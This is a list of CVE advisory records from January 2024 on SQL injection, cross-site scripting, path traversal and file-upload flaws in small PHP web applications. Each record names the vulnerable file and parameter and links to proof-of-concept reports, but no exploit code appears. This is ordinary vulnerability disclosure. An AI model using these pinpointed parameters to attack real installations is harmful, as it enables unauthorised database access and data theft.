CVE    2024    502    Candidate    A vulnerability was found in SourceCodester House Rental Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file manage_user.php of the component Edit User. The manipulation of the argument id/name/username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250610 is the identifier assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1DGb371-evTgstf42t3u2dOM4KBEt5mPw/view?usp=sharing   |   URL:https://drive.google.com/file/d/1DGb371-evTgstf42t3u2dOM4KBEt5mPw/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250610   |   URL:https://vuldb.com/?ctiid.250610   |   MISC:https://vuldb.com/?id.250610   |   URL:https://vuldb.com/?id.250610    Assigned (20240112)
CVE    2024    501    Candidate    A vulnerability has been found in SourceCodester House Rental Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Manage Invoice Details. The manipulation of the argument Invoice leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250609 was assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1xEenTDcXwNYdOxY8kdQ142nRnbcHrTRv/view?usp=sharing   |   URL:https://drive.google.com/file/d/1xEenTDcXwNYdOxY8kdQ142nRnbcHrTRv/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250609   |   URL:https://vuldb.com/?ctiid.250609   |   MISC:https://vuldb.com/?id.250609   |   URL:https://vuldb.com/?id.250609    Assigned (20240112)
CVE    2024    500    Candidate    A vulnerability, which was classified as problematic, was found in SourceCodester House Rental Management System 1.0. Affected is an unknown function of the component Manage Tenant Details. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250608.    MISC:https://drive.google.com/file/d/1z30nTAfoX58NqwIMXyHb3LB6Pv2bEm5v/view?usp=sharing   |   URL:https://drive.google.com/file/d/1z30nTAfoX58NqwIMXyHb3LB6Pv2bEm5v/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250608   |   URL:https://vuldb.com/?ctiid.250608   |   MISC:https://vuldb.com/?id.250608   |   URL:https://vuldb.com/?id.250608    Assigned (20240112)
CVE    2024    499    Candidate    A vulnerability, which was classified as problematic, has been found in SourceCodester House Rental Management System 1.0. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250607.    MISC:https://drive.google.com/file/d/1DTGd_IWdS_tMOQN0Pt1-MeZ4Yv3tXiRt/view?usp=sharing   |   URL:https://drive.google.com/file/d/1DTGd_IWdS_tMOQN0Pt1-MeZ4Yv3tXiRt/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250607   |   URL:https://vuldb.com/?ctiid.250607   |   MISC:https://vuldb.com/?id.250607   |   URL:https://vuldb.com/?id.250607    Assigned (20240112)
CVE    2024    498    Candidate    A vulnerability was found in Project Worlds Lawyer Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file searchLawyer.php. The manipulation of the argument experience leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250603.    MISC:https://github.com/laoquanshi/heishou/blob/main/lawyermanagementsystem.doc   |   URL:https://github.com/laoquanshi/heishou/blob/main/lawyermanagementsystem.doc   |   MISC:https://vuldb.com/?ctiid.250603   |   URL:https://vuldb.com/?ctiid.250603   |   MISC:https://vuldb.com/?id.250603   |   URL:https://vuldb.com/?id.250603    Assigned (20240112)
CVE    2024    497    Candidate    A vulnerability was found in Campcodes Student Information System 1.0. It has been classified as critical. Affected is an unknown function of the file /classes/Users.php?f=save. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250602 is the identifier assigned to this vulnerability.    MISC:https://github.com/laoquanshi/heishou/blob/main/SQL%20injection%20exists%20in%20student%20information%20system%20.docx   |   URL:https://github.com/laoquanshi/heishou/blob/main/SQL%20injection%20exists%20in%20student%20information%20system%20.docx   |   MISC:https://vuldb.com/?ctiid.250602   |   URL:https://vuldb.com/?ctiid.250602   |   MISC:https://vuldb.com/?id.250602   |   URL:https://vuldb.com/?id.250602    Assigned (20240112)
CVE    2024    496    Candidate    A vulnerability was found in Kashipara Billing Software 1.0 and classified as critical. This issue affects some unknown processing of the file item_list_edit.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250601 was assigned to this vulnerability.    MISC:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(1).docx   |   URL:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(1).docx   |   MISC:https://vuldb.com/?ctiid.250601   |   URL:https://vuldb.com/?ctiid.250601   |   MISC:https://vuldb.com/?id.250601   |   URL:https://vuldb.com/?id.250601    Assigned (20240112)
CVE    2024    495    Candidate    A vulnerability has been found in Kashipara Billing Software 1.0 and classified as critical. This vulnerability affects unknown code of the file party_submit.php of the component HTTP POST Request Handler. The manipulation of the argument party_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250600.    MISC:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(2).docx   |   URL:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(2).docx   |   MISC:https://vuldb.com/?ctiid.250600   |   URL:https://vuldb.com/?ctiid.250600   |   MISC:https://vuldb.com/?id.250600   |   URL:https://vuldb.com/?id.250600    Assigned (20240112)
CVE    2024    494    Candidate    A vulnerability, which was classified as critical, was found in Kashipara Billing Software 1.0. This affects an unknown part of the file material_bill.php of the component HTTP POST Request Handler. The manipulation of the argument itemtypeid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250599.    MISC:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(3).docx   |   URL:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(3).docx   |   MISC:https://vuldb.com/?ctiid.250599   |   URL:https://vuldb.com/?ctiid.250599   |   MISC:https://vuldb.com/?id.250599   |   URL:https://vuldb.com/?id.250599    Assigned (20240112)
CVE    2024    493    Candidate    A vulnerability, which was classified as critical, has been found in Kashipara Billing Software 1.0. Affected by this issue is some unknown functionality of the file submit_delivery_list.php of the component HTTP POST Request Handler. The manipulation of the argument customer_details leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250598 is the identifier assigned to this vulnerability.    MISC:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(5).docx   |   URL:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(5).docx   |   MISC:https://vuldb.com/?ctiid.250598   |   URL:https://vuldb.com/?ctiid.250598   |   MISC:https://vuldb.com/?id.250598   |   URL:https://vuldb.com/?id.250598    Assigned (20240112)
CVE    2024    492    Candidate    A vulnerability classified as critical was found in Kashipara Billing Software 1.0. Affected by this vulnerability is an unknown functionality of the file buyer_detail_submit.php of the component HTTP POST Request Handler. The manipulation of the argument gstn_no leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250597 was assigned to this vulnerability.    MISC:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20sql.docx   |   URL:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20sql.docx   |   MISC:https://vuldb.com/?ctiid.250597   |   URL:https://vuldb.com/?ctiid.250597   |   MISC:https://vuldb.com/?id.250597   |   URL:https://vuldb.com/?id.250597    Assigned (20240112)
CVE    2024    491    Candidate    A vulnerability classified as problematic has been found in Huaxia ERP up to 3.1. Affected is an unknown function of the file src/main/java/com/jsh/erp/controller/UserController.java. The manipulation leads to weak password recovery. It is possible to launch the attack remotely. Upgrading to version 3.2 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250596.    MISC:https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access2.md   |   URL:https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access2.md   |   MISC:https://vuldb.com/?ctiid.250596   |   URL:https://vuldb.com/?ctiid.250596   |   MISC:https://vuldb.com/?id.250596   |   URL:https://vuldb.com/?id.250596    Assigned (20240112)
CVE    2024    490    Candidate    A vulnerability was found in Huaxia ERP up to 3.1. It has been rated as problematic. This issue affects some unknown processing of the file /user/getAllList. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.2 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-250595.    MISC:https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access.md   |   URL:https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access.md   |   MISC:https://vuldb.com/?ctiid.250595   |   URL:https://vuldb.com/?ctiid.250595   |   MISC:https://vuldb.com/?id.250595   |   URL:https://vuldb.com/?id.250595    Assigned (20240112)
CVE    2024    489    Candidate    A vulnerability was found in code-projects Fighting Cock Information System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/action/edit_chicken.php. The manipulation of the argument ref leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250594 is the identifier assigned to this vulnerability.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL3.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL3.pdf   |   MISC:https://vuldb.com/?ctiid.250594   |   URL:https://vuldb.com/?ctiid.250594   |   MISC:https://vuldb.com/?id.250594   |   URL:https://vuldb.com/?id.250594    Assigned (20240112)
CVE    2024    488    Candidate    A vulnerability was found in code-projects Fighting Cock Information System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/action/new-feed.php. The manipulation of the argument type_feed leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250593 was assigned to this vulnerability.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL4.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL4.pdf   |   MISC:https://vuldb.com/?ctiid.250593   |   URL:https://vuldb.com/?ctiid.250593   |   MISC:https://vuldb.com/?id.250593   |   URL:https://vuldb.com/?id.250593    Assigned (20240112)
CVE    2024    487    Candidate    A vulnerability was found in code-projects Fighting Cock Information System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/action/delete-vaccine.php. The manipulation of the argument ref leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250592.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL2.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL2.pdf   |   MISC:https://vuldb.com/?ctiid.250592   |   URL:https://vuldb.com/?ctiid.250592   |   MISC:https://vuldb.com/?id.250592   |   URL:https://vuldb.com/?id.250592    Assigned (20240112)
CVE    2024    486    Candidate    A vulnerability has been found in code-projects Fighting Cock Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/action/add_con.php. The manipulation of the argument chicken leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250591.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL1.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL1.pdf   |   MISC:https://vuldb.com/?ctiid.250591   |   URL:https://vuldb.com/?ctiid.250591   |   MISC:https://vuldb.com/?id.250591   |   URL:https://vuldb.com/?id.250591    Assigned (20240112)
CVE    2024    485    Candidate    A vulnerability, which was classified as critical, was found in code-projects Fighting Cock Information System 1.0. Affected is an unknown function of the file admin/pages/tables/add_con.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250590 is the identifier assigned to this vulnerability.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL7.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL7.pdf   |   MISC:https://vuldb.com/?ctiid.250590   |   URL:https://vuldb.com/?ctiid.250590   |   MISC:https://vuldb.com/?id.250590   |   URL:https://vuldb.com/?id.250590    Assigned (20240112)
CVE    2024    484    Candidate    A vulnerability, which was classified as critical, has been found in code-projects Fighting Cock Information System 1.0. This issue affects some unknown processing of the file admin/action/update_mother.php. The manipulation of the argument age_mother leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250589 was assigned to this vulnerability.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL6.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL6.pdf   |   MISC:https://vuldb.com/?ctiid.250589   |   URL:https://vuldb.com/?ctiid.250589   |   MISC:https://vuldb.com/?id.250589   |   URL:https://vuldb.com/?id.250589    Assigned (20240112)
CVE    2024    483    Candidate    A vulnerability classified as critical was found in Taokeyun up to 1.0.5. This vulnerability affects the function index of the file application/index/controller/app/Task.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250588.    MISC:https://note.zhaoj.in/share/dm5VSyxmQIdl   |   URL:https://note.zhaoj.in/share/dm5VSyxmQIdl   |   MISC:https://vuldb.com/?ctiid.250588   |   URL:https://vuldb.com/?ctiid.250588   |   MISC:https://vuldb.com/?id.250588   |   URL:https://vuldb.com/?id.250588    Assigned (20240112)
CVE    2024    482    Candidate    A vulnerability classified as critical has been found in Taokeyun up to 1.0.5. This affects the function index of the file application/index/controller/app/Video.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250587.    MISC:https://note.zhaoj.in/share/MuWxURhTIYTP   |   URL:https://note.zhaoj.in/share/MuWxURhTIYTP   |   MISC:https://vuldb.com/?ctiid.250587   |   URL:https://vuldb.com/?ctiid.250587   |   MISC:https://vuldb.com/?id.250587   |   URL:https://vuldb.com/?id.250587    Assigned (20240112)
CVE    2024    481    Candidate    A vulnerability was found in Taokeyun up to 1.0.5. It has been rated as critical. Affected by this issue is the function shopGoods of the file application/index/controller/app/store/Goods.php of the component HTTP POST Request Handler. The manipulation of the argument keyword leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250586 is the identifier assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/TKWDqowIoLqs   |   URL:https://note.zhaoj.in/share/TKWDqowIoLqs   |   MISC:https://vuldb.com/?ctiid.250586   |   URL:https://vuldb.com/?ctiid.250586   |   MISC:https://vuldb.com/?id.250586   |   URL:https://vuldb.com/?id.250586    Assigned (20240112)
CVE    2024    480    Candidate    A vulnerability was found in Taokeyun up to 1.0.5. It has been declared as critical. Affected by this vulnerability is the function index of the file application/index/controller/m/Drs.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250585 was assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/0KtyJccrP3Ba   |   URL:https://note.zhaoj.in/share/0KtyJccrP3Ba   |   MISC:https://vuldb.com/?ctiid.250585   |   URL:https://vuldb.com/?ctiid.250585   |   MISC:https://vuldb.com/?id.250585   |   URL:https://vuldb.com/?id.250585    Assigned (20240112)
CVE    2024    479    Candidate    A vulnerability was found in Taokeyun up to 1.0.5. It has been classified as critical. Affected is the function login of the file application/index/controller/m/User.php of the component HTTP POST Request Handler. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250584.    MISC:https://note.zhaoj.in/share/Np0ZdyKEnVOV   |   URL:https://note.zhaoj.in/share/Np0ZdyKEnVOV   |   MISC:https://vuldb.com/?ctiid.250584   |   URL:https://vuldb.com/?ctiid.250584   |   MISC:https://vuldb.com/?id.250584   |   URL:https://vuldb.com/?id.250584    Assigned (20240112)
CVE    2024    478    Candidate    A vulnerability was found in code-projects Fighting Cock Information System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/edit_chicken.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250583.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL8.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL8.pdf   |   MISC:https://vuldb.com/?ctiid.250583   |   URL:https://vuldb.com/?ctiid.250583   |   MISC:https://vuldb.com/?id.250583   |   URL:https://vuldb.com/?id.250583    Assigned (20240112)
CVE    2024    477    Candidate    A vulnerability has been found in code-projects Fighting Cock Information System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/action/update-deworm.php. The manipulation of the argument usage_deworm leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250582 is the identifier assigned to this vulnerability.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL5.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL5.pdf   |   MISC:https://vuldb.com/?ctiid.250582   |   URL:https://vuldb.com/?ctiid.250582   |   MISC:https://vuldb.com/?id.250582   |   URL:https://vuldb.com/?id.250582    Assigned (20240112)
CVE    2024    476    Candidate    A vulnerability, which was classified as problematic, was found in Blood Bank & Donor Management 1.0. This affects an unknown part of the file request-received-bydonar.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250581 was assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1Hvv_oKuEplp4DTcOf9xImgyPt58a8jGz/view?usp=sharing   |   URL:https://drive.google.com/file/d/1Hvv_oKuEplp4DTcOf9xImgyPt58a8jGz/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.250581   |   URL:https://vuldb.com/?ctiid.250581   |   MISC:https://vuldb.com/?id.250581   |   URL:https://vuldb.com/?id.250581    Assigned (20240112)
CVE    2024    475    Candidate    A vulnerability, which was classified as critical, has been found in code-projects Dormitory Management System 1.0. Affected by this issue is some unknown functionality of the file modifyuser.php. The manipulation of the argument user_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250580.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20modifyuser.php.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20modifyuser.php.pdf   |   MISC:https://vuldb.com/?ctiid.250580   |   URL:https://vuldb.com/?ctiid.250580   |   MISC:https://vuldb.com/?id.250580   |   URL:https://vuldb.com/?id.250580    Assigned (20240112)
CVE    2024    474    Candidate    A vulnerability classified as critical was found in code-projects Dormitory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250579.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20login.php.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20login.php.pdf   |   MISC:https://vuldb.com/?ctiid.250579   |   URL:https://vuldb.com/?ctiid.250579   |   MISC:https://vuldb.com/?id.250579   |   URL:https://vuldb.com/?id.250579    Assigned (20240112)
CVE    2024    473    Candidate    A vulnerability classified as critical has been found in code-projects Dormitory Management System 1.0. Affected is an unknown function of the file comment.php. The manipulation of the argument com leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250578 is the identifier assigned to this vulnerability.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20comment.php.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20SQL%20injection%20vulnerabilities%20comment.php.pdf   |   MISC:https://vuldb.com/?ctiid.250578   |   URL:https://vuldb.com/?ctiid.250578   |   MISC:https://vuldb.com/?id.250578   |   URL:https://vuldb.com/?id.250578    Assigned (20240112)
CVE    2024    472    Candidate    A vulnerability was found in code-projects Dormitory Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file modifyuser.php. The manipulation of the argument mname leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-250577 was assigned to this vulnerability.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20Database%20information%20leakage%20modifyuser.php.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/7-Dormitory%20Management%20System%20has%20Database%20information%20leakage%20modifyuser.php.pdf   |   MISC:https://vuldb.com/?ctiid.250577   |   URL:https://vuldb.com/?ctiid.250577   |   MISC:https://vuldb.com/?id.250577   |   URL:https://vuldb.com/?id.250577    Assigned (20240112)
CVE    2024    471    Candidate    A vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin_route/dec_service_credits.php. The manipulation of the argument date leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250576.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20dec_service_credits.php.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20dec_service_credits.php.pdf   |   MISC:https://vuldb.com/?ctiid.250576   |   URL:https://vuldb.com/?ctiid.250576   |   MISC:https://vuldb.com/?id.250576   |   URL:https://vuldb.com/?id.250576    Assigned (20240112)
CVE    2024    470    Candidate    A vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been classified as critical. This affects an unknown part of the file /admin_route/inc_service_credits.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250575.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20inc_service_credits.php.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20inc_service_credits.php.pdf   |   MISC:https://vuldb.com/?ctiid.250575   |   URL:https://vuldb.com/?ctiid.250575   |   MISC:https://vuldb.com/?id.250575   |   URL:https://vuldb.com/?id.250575    Assigned (20240112)
CVE    2024    469    Candidate    A vulnerability was found in code-projects Human Resource Integrated System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file update_personal_info.php. The manipulation of the argument sex leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250574 is the identifier assigned to this vulnerability.    MISC:https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20update_personal_info.php.pdf   |   URL:https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20update_personal_info.php.pdf   |   MISC:https://vuldb.com/?ctiid.250574   |   URL:https://vuldb.com/?ctiid.250574   |   MISC:https://vuldb.com/?id.250574   |   URL:https://vuldb.com/?id.250574    Assigned (20240112)
CVE    2024    468    Candidate    A vulnerability has been found in code-projects Fighting Cock Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/action/new-father.php. The manipulation of the argument image leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250573 was assigned to this vulnerability.    MISC:https://github.com/BxYQ/vul/blob/main/FIGHTING_COCK_INFORMATION_SYSTEM_File9docx.pdf   |   URL:https://github.com/BxYQ/vul/blob/main/FIGHTING_COCK_INFORMATION_SYSTEM_File9docx.pdf   |   MISC:https://vuldb.com/?ctiid.250573   |   URL:https://vuldb.com/?ctiid.250573   |   MISC:https://vuldb.com/?id.250573   |   URL:https://vuldb.com/?id.250573    Assigned (20240112)
CVE    2024    467    Candidate    A vulnerability, which was classified as problematic, was found in code-projects Employee Profile Management System 1.0. Affected is an unknown function of the file edit_position_query.php. The manipulation of the argument pos_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250572.    MISC:https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM_Xss.pdf   |   URL:https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM_Xss.pdf   |   MISC:https://vuldb.com/?ctiid.250572   |   URL:https://vuldb.com/?ctiid.250572   |   MISC:https://vuldb.com/?id.250572   |   URL:https://vuldb.com/?id.250572    Assigned (20240112)
CVE    2024    466    Candidate    A vulnerability, which was classified as critical, has been found in code-projects Employee Profile Management System 1.0. This issue affects some unknown processing of the file file_table.php. The manipulation of the argument per_id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250571.    MISC:https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_SQL1.pdf   |   URL:https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_SQL1.pdf   |   MISC:https://vuldb.com/?ctiid.250571   |   URL:https://vuldb.com/?ctiid.250571   |   MISC:https://vuldb.com/?id.250571   |   URL:https://vuldb.com/?id.250571    Assigned (20240112)
CVE    2024    465    Candidate    A vulnerability classified as problematic was found in code-projects Employee Profile Management System 1.0. This vulnerability affects unknown code of the file download.php. The manipulation of the argument download_file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-250570 is the identifier assigned to this vulnerability.    MISC:https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_FileRead.pdf   |   URL:https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_FileRead.pdf   |   MISC:https://vuldb.com/?ctiid.250570   |   URL:https://vuldb.com/?ctiid.250570   |   MISC:https://vuldb.com/?id.250570   |   URL:https://vuldb.com/?id.250570    Assigned (20240112)
CVE    2024    464    Candidate    A vulnerability classified as critical has been found in code-projects Online Faculty Clearance 1.0. This affects an unknown part of the file delete_faculty.php of the component HTTP GET Request Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250569 was assigned to this vulnerability.    MISC:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL4.pdf   |   URL:https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL4.pdf   |   MISC:https://vuldb.com/?ctiid.250569   |   URL:https://vuldb.com/?ctiid.250569   |   MISC:https://vuldb.com/?id.250569   |   URL:https://vuldb.com/?id.250569    Assigned (20240112)
